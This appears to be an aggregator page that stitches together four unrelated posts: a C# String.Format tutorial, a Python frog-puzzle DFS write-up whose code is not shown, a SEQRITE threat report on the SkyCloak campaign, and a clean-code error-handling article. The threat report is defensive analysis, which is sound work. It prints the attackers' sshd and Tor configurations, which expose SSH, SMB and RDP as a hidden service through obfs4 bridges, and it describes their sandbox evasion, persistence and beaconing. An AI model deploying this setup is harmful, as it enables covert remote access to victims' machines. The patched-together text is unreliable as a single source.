    Interpolation is the ability to wrap a variable inside a string and, eventually, call methods on it while creating the string itself.

    var messageWithInterpolation = $"I caught a {pkm.Name} on {pkm.CaptureDate.ToString("yyyy-MM-dd")}";
    

    As you see, it’s easier to read than simple concatenation.

    The downside of this approach is that here you don’t have a visual understanding of what is the expected string, because the variables drive your attention away from the message you are building with this string.

    PS: notice the $ at the beginning of the string and the { and } used to interpolate the values.

    Formatting is the way to define a string using positional placeholders.

    var messageWithFormatting = String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate.ToString("yyyy-MM-dd"));
    

    We are using the Format static method from the String class to define a message, set up the position of the elements and the elements themselves.

    Now we have a visual clue of the general structure of the string, but we don’t have a hint of which values we can expect.

Even if string.Format is often considered obsolete, there is still a reason to use it when formatting strings: this class can help you format the values with default and custom formatters.

    But first, a quick note on the positioning.

    Positioning and possible errors in String.Format

As you may expect, for string.Format positioning is 0-based. But while the numbering must start from zero, the order in which the placeholders appear inside the string doesn’t matter. In fact, the next two strings are the same:

    var m1 = String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate);
    var m2 = String.Format("I caught a {1} on {0}", pkm.CaptureDate, pkm.Name);
    

    Of course, if you swap the positioning in the string, you must also swap the order of the parameters.

    Since we are only specifying the position, we can use the same value multiple times inside the same string, just by repeating the placeholder:

    String.Format("I caught a {0} (YES, {0}!) on {1}", pkm.Name, pkm.CaptureDate);
    // I caught a Garchomp (YES, Garchomp!) on 06/05/2020 14:55:23
    

What happens if the number of placeholders differs from the number of arguments?

    If there are more parameters than placeholders, the exceeding ones are simply ignored:

    String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate, pkm.PokedexIndex);
// I caught a Garchomp on 06/05/2020 14:55:23
    

    On the contrary, if there are more placeholders than parameters, we will get a FormatException:

    String.Format("I caught a {0} on {1}", pkm.Name);
    

    with the message

Index (zero based) must be greater than or equal to zero and less than the size of the argument list.

    How to format numbers

    You can print numbers with lots of different formats, you know. Probably you’ve already done it with the ToString method. Well, here’s almost the same.

    You can use all the standard numeric formats as formatting parameters.

    For example, you can write a decimal as a currency value by using C or c:

    String.Format("{0:C}", 12.7885m);
    // £12.79
    

    In this way, you can use the symbols belonging to the current culture (in this case, we can see the £) and round the value to the second decimal.

If you want to change the current culture, you must set it up globally or, at least, change the culture for the current thread:

    Thread.CurrentThread.CurrentCulture = new System.Globalization.CultureInfo("it-IT");
    
    Console.WriteLine(String.Format("{0:C}", 12.7885m)); // 12,79 €
    

If you want to handle numbers with different formats, you can use all the formats defined in the official documentation (linked above). Among them we can find, for example, the fixed-point format, which manages both the sign and the number of decimal digits:

    String.Format("{0:f8}", 12.7885m) //12.78850000
    

    With :f8 here we are saying that we want the fixed-point format with 8 decimal digits.
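If you’re curious, here are a few more standard numeric format strings from the same documentation, as a quick sketch; the exact separators, symbols, and spacing depend on the current culture:

String.Format("{0:N2}", 12345.6789m)  // 12,345.68 (grouped digits, 2 decimals)
String.Format("{0:P1}", 0.1278m)      // 12.8% (the value gets multiplied by 100)
String.Format("{0:E2}", 12345.6789m)  // 1.23E+004 (scientific notation)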

    How to format dates

As with numbers, the default representation of dates is the one provided by the ToString method.

    String.Format("{0}", new System.DateTime(2020,5,8,1,6,0))
    // 08/05/2020 01:06:00
    

    This is useful, but not very customizable.
    Luckily we can use our usual formatting strings to print the date as we want.

    For example, if you want to print only the date, you can use :d in the formatting section:

    String.Format("{0:d}", new System.DateTime(2020,5,8,1,6,0))
    // 08/05/2020
    

    and you can use :t if you are interested only in the time info:

    String.Format("{0:t}", new System.DateTime(2020,5,8,1,6,0))
    // 01:06
    

    Of course, you can define your custom formatting to get the info in the format you want:

    String.Format("{0:yyyy-MM-dd hh:mm}", new System.DateTime(2020,5,8,1,6,0))
    // 2020-05-08 01:06
    

PPS: remember how the current culture impacts the result!
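For example, the same date prints differently under different cultures; here’s a quick sketch using the thread-culture approach shown earlier:

var date = new System.DateTime(2020, 5, 8, 1, 6, 0);

Thread.CurrentThread.CurrentCulture = new System.Globalization.CultureInfo("en-US");
Console.WriteLine(String.Format("{0:d}", date)); // 5/8/2020

Thread.CurrentThread.CurrentCulture = new System.Globalization.CultureInfo("it-IT");
Console.WriteLine(String.Format("{0:d}", date)); // 08/05/2020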

    How to define custom formats

    As you may imagine, the default value used for formatting is the one defined by ToString. We can prove it by simply defining the ToString method in our CapturedPokemon class

    class CapturedPokemon
    {
      // fields...
    
      public override string ToString()
      {
        return $"Name: {Name} (#{PokedexIndex})";
      }
    }
    

    and by passing the whole pkm variable defined at the beginning of this article:

    String.Format("{0}", pkm)
    // Name: Garchomp (#445)
    

    But, of course, you may want to use different formatting across your project.

    Let’s define a formatter for my CapturedPokemon class. This class must implement both IFormatProvider and ICustomFormatter interfaces.

    public class PokemonFormatter : IFormatProvider, ICustomFormatter
    {
      // todo
    }
    

    First of all, let’s implement the GetFormat method from IFormatProvider with the default code that works for every custom formatter we are going to build:

    public object GetFormat(Type formatType)
    {
      if (formatType == typeof(ICustomFormatter))
        return this;
      else
        return null;
    }
    

    And then we can define the core of our formatter in the Format method. It accepts 3 parameters: format is the string that we pass after the : symbol, like in :d3; arg is a generic object that references the object to be formatted and formatProvider is… well, I don’t know! Drop me a comment if you know how to use it and why!

    Moving on, and skipping the initial checks, we can write the core of the formatting like this:

    switch (format.ToUpper())
    {
      case "FULL": return $"{pokemon.Name} (#{pokemon.PokedexIndex}) caught on {pokemon.CaptureDate}";
      case "POKEDEX": return $"{pokemon.Name} (#{pokemon.PokedexIndex})";
      case "NAME": return $"{shortName}";
      default:
        throw new FormatException($"The format {format} is not valid");
    }
    

    So the point is to define different formats, pass one of them in the format parameter, and apply it to the arg object.

    We can then use the String.Format method in this way:

    String.Format(new PokemonFormatter(), "{0:full}", pkm) // Garchomp (#445) caught on 06/05/2020 14:55:23
    String.Format(new PokemonFormatter(), "{0:pokedex}", pkm) // Garchomp (#445)
    String.Format(new PokemonFormatter(), "{0:name}", pkm) //Grchmp
    

If you are interested in the whole code, you can find it at the end of the article.

By the way, why should we care about formatters? Because we must always take into account the separation of concerns. Why should the CapturedPokemon class expose a method for every formatting variant? That’s outside the scope of the class definition itself, so it’s better to write the formatting somewhere else and use it only when it’s needed.

    Conclusion

Using String.Format is now considered a vintage way to format strings. Even Microsoft itself recommends using string interpolation because it is more readable (syntax highlighting helps you see what the values are) and more flexible (you directly create the string instead of calling an additional method, string.Format itself).

    By the way, I think it’s important to get to know even String.Format because it can be useful not only for readability (because you can see the structure of the returned string even without looking at the actual parameters used) but also because you can create strings dynamically, like in this example:

    string en = "My name is {0}";
    string it = "Il mio nome è {0}";
    
    var actualString = DateTime.UtcNow.Ticks % 2 == 0 ? it : en;
    
    Console.WriteLine(string.Format(actualString, "Davide"));
    

    If you want to read more about string.Format, just head to the Microsoft documentation, where you can find lots of examples.

    In the end, here’s the full code of the Format method for our PokemonFormatter class.

    public string Format(string format, object arg, IFormatProvider formatProvider)
    {
      if (!this.Equals(formatProvider)) { return null; }
    
      if (!(arg is CapturedPokemon pokemon)) { return null; }
    
      if (string.IsNullOrWhiteSpace(format))
        format = "full";
    
      var shortName = Regex.Replace(pokemon.Name, "a|e|i|o|u", "");
    
      switch (format.ToUpper())
      {
        case "FULL": return $"{pokemon.Name} (#{pokemon.PokedexIndex}) caught on {pokemon.CaptureDate}";
        case "POKEDEX": return $"{pokemon.Name} (#{pokemon.PokedexIndex})";
        case "NAME": return $"{shortName}";
        default:
          throw new FormatException($"The format {format} is not valid");
      }
    }
    

    Happy coding!



    Source link

  • Frog Leap Puzzle with Depth-First Search (DFS) – Useful code

    Frog Leap Puzzle with Depth-First Search (DFS) – Useful code


TL;DR: We solve the classic “frog leap” puzzle with Depth-First Search (DFS) by generating the next boards around the blank and trying jumps before steps. This trick finds the minimal solution in exactly N^2+2N moves.

The classic frog puzzle looks like this, when 3 frogs per side are used:

    The picture is from the site data.bangtech.com/algorithm/switch_frogs_to_the_opposite_side, and the game actually works pretty well there 🙂

The core idea is to map all the frogs around the blank rock (_ in the code) and to run DFS on it. There are at most 4 such frogs, so it is not that tough. In the code, they sit at positions b-2, b-1, b+1, and b+2 around the blank at index b.
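The original post shows the snippets as images, so here is a minimal reconstruction of that neighbor generation; the function and variable names are my own:

def neighbors(state):
    """Yield next boards by moving one frog into the blank (_).

    Only the frogs at b-2, b-1, b+1 and b+2 can move; jumps
    (distance 2) are tried before steps.
    """
    b = state.index("_")
    for src in (b - 2, b + 2, b - 1, b + 1):  # jumps first, then steps
        if 0 <= src < len(state):
            frog = state[src]
            # > may only move right, < may only move left
            if (frog == ">" and src < b) or (frog == "<" and src > b):
                s = list(state)
                s[b], s[src] = s[src], s[b]
                yield "".join(s)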

The 4 results from the starting state >>>_<<< are >_>><<<, >>><<_<, >>_><<< and >>><_<< (two jumps and two steps).

    The _ is the rock. > is a frog facing right, < is a frog facing left.

The magic of the code is that it uses a DFS approach, trying each new move first, as a stack (LIFO). If it gets stuck, the built-in behavior of the stack backtracks and tries the next one. We keep a visited set and a path. Since visited is a set, repetitions and endless loops are avoided. The path is the current route from the start, and with Python we append on enter and pop on backtrack.
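Here is a matching reconstruction of the dfs() itself; the append-on-enter and pop-on-backtrack behavior is exactly what the paragraph above describes:

def dfs(state, goal, visited, path):
    """Depth-first search; returns the list of boards from start to goal."""
    path.append(state)            # append on enter
    if state == goal:
        return list(path)
    visited.add(state)
    for nxt in neighbors(state):
        if nxt not in visited:
            result = dfs(nxt, goal, visited, path)
            if result:
                return result
    path.pop()                    # pop on backtrack
    return None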

In the GitHub example and the YouTube video, I am printing a bit more, but the minimal version is the code above. Running it for 3 frogs per side shows the search hitting dead ends and backtracking.

After the first dead end is removed, the second dead end is also removed, as it only leads to the first one. The “magic” of the stack, LIFO, DFS and recursion working together as a team 🙂

To make the code complete, we also need the start_state() and goal_state() functions referred to in the dfs() above.
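Reconstructed in the same spirit, together with a small driver; the expected move count follows the N^2+2N formula from the TL;DR:

def start_state(n):
    # n frogs facing right, the blank rock, n frogs facing left
    return ">" * n + "_" + "<" * n   # n = 3 -> ">>>_<<<"

def goal_state(n):
    return "<" * n + "_" + ">" * n   # n = 3 -> "<<<_>>>"

# Example run for 3 frogs per side
solution = dfs(start_state(3), goal_state(3), set(), [])
print(len(solution) - 1)  # expect 15 moves (N^2 + 2N)
for board in solution:
    print(board)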

The complete result with 3 frogs per side is achieved after visiting only 34 states, which is quite OK.

    The YT video is here:
    https://www.youtube.com/watch?v=DVgqA8-c1oI
    The GitHub link is here: https://github.com/Vitosh/Python_personal/tree/master/YouTube/045_Python_Frog_Jump

    Enjoy it 🙂



    Source link

  • Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus

    Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus


    Authors: Sathwik Ram Prakki and Kartikkumar Jivani 

    Contents 

    • Introduction 
    • Key Targets 
      • Industries 
      • Geographical Focus 
    • Infection and Decoys 
    • Technical Analysis 
      • PowerShell Stage 
      • Persistence 
      • Configuration 
    • Infrastructure and Attribution 
    • Conclusion 
    • SEQRITE Protection 
    • IOCs 
    • MITRE ATT&CK 

    Introduction 

    SEQRITE Labs has identified a campaign targeting military personnel of both Russia and Belarus, especially the Russian Airborne Forces and Belarusian Special Forces. The infection chain exposes multiple local services via Tor using obfs4 bridges, allowing the attacker to communicate anonymously via an onion address. In this blog, we will explore the infection chain, which runs through multiple PowerShell stages, the decoys used to lure victims, and how SSH is exposed as a Tor hidden service while maintaining persistence. 

    Multiple campaigns with a similar geographical focus have been identified this year, such as HollowQuill, seen in early 2025, which targeted various Russian entities such as academic and research institutes directly linked to the government and defence sectors. In July, we encountered another campaign, dubbed CargoTalon, that targeted the aerospace and defense sectors of Russia by deploying the Eaglet implant, where overlaps with the HeadMare group were observed. More recently, the targeting of the Russian automobile and e-commerce industries with the CAPI Backdoor has been tracked as operation MotorBeacon. 

    Key Targets 

    Industries 

    Geographical Focus 

    • Russian Federation 
    • Republic of Belarus 

    Infection and Decoys 

     

    Fig. 1 – Infection Chain 

    The first lure is a nomination letter from the acting commander of Military Unit 71289, which refers to the 83rd Separate Guards Airborne Assault Brigade stationed in Ussuriysk (Eastern Military District), to the Chief of the Russian Airborne Forces (VDV) for the appointment of military personnel. Ussuriysk is on the opposite side of the country from the ongoing Russia-Ukraine war, closer to both the China-Russia border and the Pacific Ocean. 

    Fig. 2 – Decoy targeting Russia 

    The second decoy letter concerns the training of military personnel from October 13th to 16th, 2025, at Military Unit 89417, which refers to the 5th Separate Spetsnaz Brigade of the Belarusian Special Forces located in Maryina Horka near Minsk (reports suggest the unit was disbanded in 2019, but some activity was seen in 2021). 


    Fig. 3 – Decoy targeting Belarus 

    Technical Analysis 

    The archive files were uploaded from Belarus with modification dates of 2025-Oct-15 and 2025-Oct-21. The initial phishing ZIP contains a shortcut LNK with a double-extension filename that translates as follows: 

    Original filename  Translated name 
    ТЛГ на убытие на переподготовку.pdf.lnk  TLG departure for retraining.pdf.lnk 
    Исх №6626 Представление на назначение на воинскую должность.pdf.lnk  Ref. No. 6626 Nomination for appointment to military position.pdf.lnk 

    The shortcut files have machine IDs ‘desktop-V7i6LHO’ and ‘desktop-u4a2HgZ’ and appear to have been weaponized in the last week of September 2025. They trigger PowerShell commands which act as the initial dropper stage, where another archive file beside the LNK is used to set up the entire chain. 

    Fig. 4 – Shortcut file triggers PowerShell 

    The command extracts the first archive file into either of the directories: 

    • %APPDATA%\dynamicUpdatingHashingScalingContext 
    • %USERPROFILE%\Downloads\incrementalStreamingMergingSocket 

    and subsequently uses it to extract the second archive file from the folder ‘FOUND.000’. This multi-stage extraction drops the payloads into either the ‘$env:APPDATA\logicpro’ or ‘$env:APPDATA\reaper’ directory, reads the content of a text file, and executes it silently via a hidden PowerShell process. 

    • \logicpro\scalingEncryptingEncoding 
    • \reaper\responsiveHashingSocketScalableDeterministic 

    Before jumping into the next stage, let’s look at the contents of both archives. They contain multiple EXEs and text files, the decoy PDF, a DLL, and a couple of XML files. Following the above chain, the next stage is the execution of a PowerShell script. 

    Fig. 5 – Contents of archive files 

    PowerShell Stage 

    The script starts by checking whether the Windows ‘Recent’ folder has more than ten shortcut files in it. This is an anti-analysis check to evade sandbox environments and make sure there is normal user activity. Another check verifies that the process count is greater than 50, after which the decoy document is opened. 

    Fig. 6 – PowerShell anti-analysis 

    Then it creates a mutex to ensure that only one instance is running. It reads both the XML files after replacing the username and registers scheduled tasks to start them immediately. This establishes persistence and executes the next stage of payloads defined in those XMLs. Multiple strings are concatenated to form the full onion address. 

    Fig. 7 – PowerShell stager 

    Then it waits until the hostname file, which Tor writes into the configured hidden service directory, exists; in other words, it waits until the local Tor instance is up and the onion address is available. It creates an identification beacon in a specific format ‘<username>:<onion-address>:3-yeeifyem‘ (or ending with ‘:2-lrwkymi’) and sends it using curl via the local Tor SOCKS listener on port 9050. Multiple retry flags are used to make this beaconing persistent. 

    Fig. 8 – local hostname for beacon 

    Persistence 

    The XML files are Windows scheduled task definitions that run daily starting at 2025-09-25T01:41:00-08:00 and have a logon trigger for the specified user. These tasks are hidden and configured to run even when the computer is idle, on demand, and without network access. They ignore multiple instances and have no execution time limit. 

    Fig. 9 – XML for persistence 

    Fig. 10 – Scheduled Task 

    Finally, moving on to the EXEs, to which configuration files are passed as arguments: some are most likely SSH and SFTP server binaries, based on their PDB paths and internal names. The XML files trigger either the first two or the last two commands (one pair per campaign): 

    • %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting 
    • %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster 
    • %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession 
    • %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant 

    Both githubdesktop.exe and googlemaps.exe from above, along with ssh-shellhost.exe, ebay.exe (SFTP server) and libcrypto.dll (LibreSSL) are legitimate “OpenSSH for Windows” binaries with compilation timestamp 2023-12-13 and PDB paths: 

    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb” 
    • C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb 

    libcrypto.dll is bundled for encryption, key exchange, and hashing; whereas ssh-shellhost.exe is used for interactive SSH sessions. This confirms that the attacker deploys a self-contained OpenSSH server inside a user’s profile directory using Tor, likely for stealth remote administration and post-exploitation persistence. 

    Configuration 

    The first configuration passed to SSHD [githubdesktop.exe (or) googlemaps.exe] is as follows; the only difference between the two campaigns is that the sftp subsystem is not present in the second one. It uses the non-standard port 20321, disables password authentication, and allows login only by public key, referencing files containing the private and authorized keys. Those key files are: 

    • redundantOptimizingInstanceVariableLogging 
    • redundantExecutingContainerIndexing 
    • incrementalMergingIncrementalImmutableProtocol 
    • loggingOptimizedDecoding 

    Port 20321 
    ListenAddress 127.0.0.1 
    HostKey redundantOptimizingInstanceVariableLogging 
    PubkeyAuthentication yes 
    PasswordAuthentication no     
    
    AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing 
    Subsystem sftp AppData\Roaming\logicpro\ebay.exe 

    The second configuration is passed to pinterest.exe (or) googlesheets.exe, which is basically tor.exe; it creates an onion service and exposes SSH, SMB, RDP and other ports over Tor. It is configured to use the obfs4 pluggable transport via an EXE named confluence.exe (or rider.exe), which is simply an obfs4proxy binary. Bridges are used to hide the connections: bridge endpoints are defined with IP, port, fingerprint, cert and iat-mode, allowing outbound Tor connections via those bridges. 

    Fig. 11 – Communication with Tor bridges 

    HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" 
    HiddenServicePort 20322 127.0.0.1:20321 
    HiddenServicePort 11435 127.0.0.1:445 
    HiddenServicePort 13893 127.0.0.1:3389 
    HiddenServicePort 12192 127.0.0.1:12191 
    HiddenServicePort 14763 127.0.0.1:14762 
    GeoIPFile geoip 
    GeoIPv6File geoip6 
    
    ClientTransportPlugin obfs4 exec confluence.exe  
    UseBridges 1 
    Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 
    Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2 

    In the same way, the legitimate obfs4proxy.exe is renamed to confluence.exe or rider.exe and referenced in the configuration. 

    Infrastructure and Attribution 

    The onion address used for registering victims via Tor is: 

    • yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    Based on recent netflow data from these Tor bridge ports, we have seen traffic with Russia and even a few neighboring nations. These IPs are categorized as Tor services, cloud hosts, or residential. 

    IP:Port  ASN  Country  Category 
    77.20.116[.]133:8080   3209 (Vodafone GmbH)  Germany  residential, proxy 
    156.67.24[.]239:33333  51167 (Contabo GmbH)  France  tor 
    146.59.116[.]226:50845  16276 (OVH SAS)  Poland  cloud 
    142.189.114[.]119:443  577 (BACOM)  Canada   

    Very little traffic is seen on both 156.67.24[.]239:33333 and 77.20.116[.]133:8080, whereas Russian traffic is seen on the remaining two IPs, which are part of the configuration and of the decoys targeting Russia. 

    Two Russian-linked groups, APT44 (Sandworm) and APT28, have previously been observed using Tor to communicate with onion domains. In this case, however, custom configurations for the pluggable transport and SSHD are used in an attempt to evade network monitoring, and the attacks target Russia and Belarus. Similar targeting has been conducted by the pro-Ukraine APTs Angry Likho (Sticky Werewolf) and Awaken Likho (Core Werewolf), but SkyCloak remains unattributed for now. 

    Conclusion 

    A multi-stage intrusion chain has been identified, targeting both Russian and Belarusian military personnel, which leads to a PowerShell stager that deploys OpenSSH and Tor with obfs4 bridges. This points to a stealth-oriented campaign designed to establish covert remote access and lateral movement within targeted environments. Based on current evidence, the campaign appears consistent with Eastern European-linked espionage activity targeting defense and government sectors, though attribution to previously documented operations remains low-confidence. 

    SEQRITE Protection 

    • XML.Skycloak.50052.GC 
    • SCRIPT.Trojan.50053.GC 
    • SCRIPT.Skycloak.50054 

    IOCs 

    Archive (ZIP) 
    952f86861feeaf9821685cc203d67004  ТЛГ на убытие на переподготовку.pdf 
    d246dfa9e274c644c5a9862350641bac  persistentHandlerHashingEncodingScalable.zip 
    8716989448bc88ba125aead800021db0  Исх №6626 Представление на назначение на воинскую должность.pdf.zip 
    ae4f82f9733e0f71bb2a566a74eb055c  processorContainerLogging.zip 
    Shortcut (LNK) 
    32bdbf5c26e691cbbd451545bca52b56  ТЛГ на убытие на переподготовку.pdf.lnk 
    2731b3e8524e523a84dc7374ae29ac23  Исх №6626 Представление на назначение на воинскую должность.pdf.lnk 
    PowerShell (PS1) 
    39937e199b2377d1f212510f1f2f7653  scalingEncryptingEncoding 
    9242b49e9581fa7f2100bd9ad4385e8c  responsiveHashingSocketScalableDeterministic 
    XML 
    b61a80800a1021e9d0b1f5e8524c5708  loadingBufferFunctionHashing.xml 
    b52dfb562c1093a87b78ffb6bfc78e07  incrementalRedundantRendering.xml 
    45b16a0b22c56e1b99649cca1045f500  synchronizingContextBufferSchemaIncremental.xml 
    dcdf4bb3b1e8ddb24ac4e7071abd1f65  frameworkRepositoryDynamicOptimized.xml 
    Text 
    e1a8daea05f25686c359db8fa3941e1d  controllerGatewayEncrypting 
    b3382b6a44dc2cefdf242dc9f9bc9d84  pipelineClusterDeployingCluster 
    229afc52dccd655ec1a69a73369446dd  hashingBindingDynamicUpdatingSession 
    f6837c62aa71f044366ac53c60765739  decodingDistributedParsingHandlerRedundant 
    2599d1b1d6fe13002cb75b438d9b80c4  redundantExecutingContainerIndexing 
    b7ae44ac55ba8acb527b984150c376e2  redundantOptimizingInstanceVariableLogging 
    0f6aaa52b05ab76020900a28afff9fff  redundantOptimizingInstanceVariableLogging.pub 
    219e7d3b6ff68a36c8b03b116b405237  loggingOptimizedDecoding 
    dfc78fe2c31613939b570ced5f38472c  incrementalMergingIncrementalImmutableProtocol 
    77bb74dd879914eea7817d252dbab1dc  incrementalMergingIncrementalImmutableProtocol.pub 
    PE (EXE/DLL) 
    f6c0304671c4485c04d4a1c7c8c8ed94  githubdesktop.exe / googlemaps.exe (sshd.exe) 
    cdd065c52b96614dc880273f2872619f  pinterest.exe / googlesheets.exe (tor.exe) 
    37e83a8fc0e4e6ea5dab38b0b20f953b  ebay.exe (sftp-server.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  ssh-shellhost.exe 
    664f09734b07659a6f75bca3866ae5e8  confluence.exe / rider.exe (obfs4proxy.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  libcrypto.dll 
    Decoys 
    23ad48b33d5a6a8252ed5cd38148dcb7  ТЛГ на убытие на переподготовку.pdf 
    c8c41b7e02fc1d98a88f66c3451a081b  Исх №6626 Представление на назначение на воинскую должность.pdf 
    Tor Bridges 
    77.20.116[.]133:8080 
    156.67.24[.]239:33333 
    146.59.116[.]226:50845 
    142.189.114[.]119:443 

    yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    MITRE ATT&CK 

    Tactic  Technique ID  Technique Name 
    Resource Development  T1583  Acquire Infrastructure 
    Initial Access  T1566.001  Phishing: Spearphishing Attachment 
    Execution  T1204.002  User Execution: Malicious File 
    Execution  T1059.001  Command and Scripting Interpreter: PowerShell 
    Execution  T1106  Native API 
    Persistence  T1053.005  Scheduled Task/Job: Scheduled Task 
    Persistence  T1547  Boot or Logon Autostart Execution 
    Defense Evasion  T1027  Obfuscated Files or Information 
    Defense Evasion  T1036  Masquerading 
    Defense Evasion  T1497  Virtualization/Sandbox Evasion 
    Discovery  T1083  File and Directory Discovery 
    Discovery  T1046  Network Service Discovery 
    Discovery  T1033  System Owner/User Discovery 
    Lateral Movement  T1021  Remote Services 
    Collection  T1119  Automated Collection 
    Command and Control  T1071  Application Layer Protocol 
    Command and Control  T1090  Proxy 
    Command and Control  T1571  Non-Standard Port 
    Exfiltration  T1041  Exfiltration Over C2 Channel 

     




  • Clean code tips – Error handling | Code4IT

    Clean code tips – Error handling | Code4IT


    The way you handle errors on your code can have a huge impact on the maintainability of your projects. Don’t underestimate the power of clean error handling.


    We all know that nothing goes perfectly smoothly: network errors, invalid formats, null references… We can have a long, long list of what can go wrong in our applications. So, it is important to handle errors with the same care we have for all the rest of our code.

    This is the fourth part of this series about clean code, which is a recap of the things I learned from Uncle Bob’s “Clean Code”. If you want to read more, here are the other articles I wrote:

    1. names and function arguments
    2. comments and formatting
    3. abstraction and objects
    4. error handling
    5. tests

    Status codes or exceptions?

    In Uncle Bob’s opinion, we should always prefer exceptions over status codes when returning values.

    Generally speaking, I agree. But let’s discuss a little about the differences.

    First of all, below you can see a method that, when downloading a string, returns both the status code and the real content of the operation.

    void Main()
    {
        (HttpStatus status, string content) = DownloadContent("https://code4it.dev");
        if (status == HttpStatus.Ok)
        {
            // do something with the content
        }
        else if (status == HttpStatus.NotFound)
        {
            // do something else
        }
        // and so on
    }
    
    public (HttpStatus, string) DownloadContent(string url)
    {
        // do something
    }
    
    // Define other methods and classes here
    
    public enum HttpStatus
    {
        Ok,
        NotFound,
        Unauthorized,
        GenericError
    }
    

    When you use status codes, you have to manually check the result of the operation with a switch or an if-else. So, if the caller method forgets to check whether the operation was successful, you might run into unexpected execution paths.

    Now, let’s transform the code and use exceptions instead of status codes:

    void Main()
    {
        try
        {
            string content = DownloadContent("https://code4it.dev");
        }
        catch (NotFoundException nfe) {/*do something*/}
        catch (UnauthorizedException ue) {/*do something*/}
        catch (Exception e) {/*do something else*/}
    }
    
    public string DownloadContent(string url)
    {
        // do something
        return "something";
        // OR throw NotFoundException
        // OR throw UnauthorizedException
        // OR do something else
    }
    

    As you can see, the code is clearly easier to read: the “main” execution is defined within the try block.

    What are the pros and cons of using exceptions over status codes?

    • PRO: the “happy path” is easier to read
    • PRO: every time you forget to manage all the other cases, you will see a meaningful exception instead of ending up with a messy execution without a clue of what went wrong
    • PRO: the execution and the error handling parts are strongly separated, so you can easily separate the two concerns
    • CON: you are defining the execution path using exceptions instead of status (which is bad…)
    • CON: every time you add a try-catch block, you are adding overhead on the code execution.

    The reverse is obviously valid for status codes.

    So, what to do? Well, exceptions should be used in exceptional cases, so if you are expecting a range of possible statuses that can all be managed in a reasonable way, go for enums. If you are expecting an “unexpected” path that you cannot manage directly, go for exceptions!

    If you really need to use status codes, use enums instead of strings or plain numbers.

    TDD can help you handle errors

    Don’t forget that error handling must be thoroughly tested. One of the best ways is to write your tests first: this will help you figure out what kind of exceptions, if any, your method should throw, and which ones it should manage.

    Once you have written some tests for error handling, add a try-catch block and start thinking about the actual business logic: you can now be sure that you’re covering errors with your tests.
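
    For instance, a test-first sketch could pin down the expected exception before the method body even exists. Here is an xUnit-style example of mine (the class name and URL are purely illustrative):

    [Fact]
    public void DownloadContent_Throws_NotFoundException_When_Resource_Is_Missing()
    {
        var downloader = new ContentDownloader(); // hypothetical class under test

        Assert.Throws<NotFoundException>(() =>
        {
            downloader.DownloadContent("https://code4it.dev/not-existing");
        });
    }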

    Wrap external dependencies to manage their exceptions

    Say that you use a third-party library as a core part of your application.

    public class ExternalDependency
    {
        public string DownloadValue(string resourcePath){
            // do something
        }
    }
    

    and that this method throws some custom exceptions, like ResourceNotFoundException, InvalidCredentialsExceptions and so on.

    In the client code you might want to handle errors coming from that external dependency in a specific manner, while the general error handling has a different behavior.

    void Main()
    {
        ExternalDependency service = CreateExternalService();
    
        try
        {
        var value = GetValueToBeDownloaded();
            service.DownloadValue(value);
        }
        catch (ResourceNotFoundException rnfex)
        {
            logger.Log("Unable to get resource");
            ManageDownloadFailure();
        }
        catch (InvalidCredentialsExceptions icex)
        {
            logger.Log("Unable to get resource");
            ManageDownloadFailure();
        }
        catch (Exception ex)
        {
            logger.Log("Unable to complete the operation");
            DoSomethingElse();
        }
    }
    

    This seems reasonable, but what does it imply? First of all, we are repeating the same error handling in multiple catch blocks. Here I have only 2 custom exceptions, but think of complex libraries that can throw tens of exceptions. Also, what if the library adds a new Exception? In this case, you should update every client that calls the DownloadValue method.

    Also, the caller is not actually interested in the type of exception thrown by the external library; it cares only about the status of the operation, not the reason for a potential failure.

    So, in this case, the best thing to do is to wrap this external class into a custom one. In this way we can define our Exception types, enrich them with all the properties we need, and catch only them; all of this while being sure that even if the external library changes, our code won’t be affected.

    So, here’s an example of how we can wrap the ExternalDependency class:

    public class MyDownloader
    {
        public string DownloadValue(string resourcePath)
        {
            var service = new ExternalDependency();
    
            try
            {
                return service.DownloadValue(resourcePath);
            }
            catch (Exception ex)
            {
                throw new ResourceFileDownloadException(ex, resourcePath);
            }
        }
    }
    

    Now that all our clients use the MyDownloader class, the only type of exception to manage is ResourceFileDownloadException. Notice how I enriched this exception with the name of the resource that the service wasn’t able to download.
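
    The article doesn’t show the exception class itself; a minimal definition consistent with the constructor used above might be:

    public class ResourceFileDownloadException : Exception
    {
        public string ResourcePath { get; }

        public ResourceFileDownloadException(Exception innerException, string resourcePath)
            : base($"Unable to download resource {resourcePath}", innerException)
        {
            ResourcePath = resourcePath;
        }
    }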

    Another good reason to wrap external libraries? What if they become obsolete, or you just need to use something else because it fits better with the use case you need?

    Define exception types thinking of the clients

    Why haven’t I exposed multiple exceptions, but I chose to throw only a ResourceFileDownloadException? Because you should define your exceptions thinking of how they can be helpful to their caller classes.

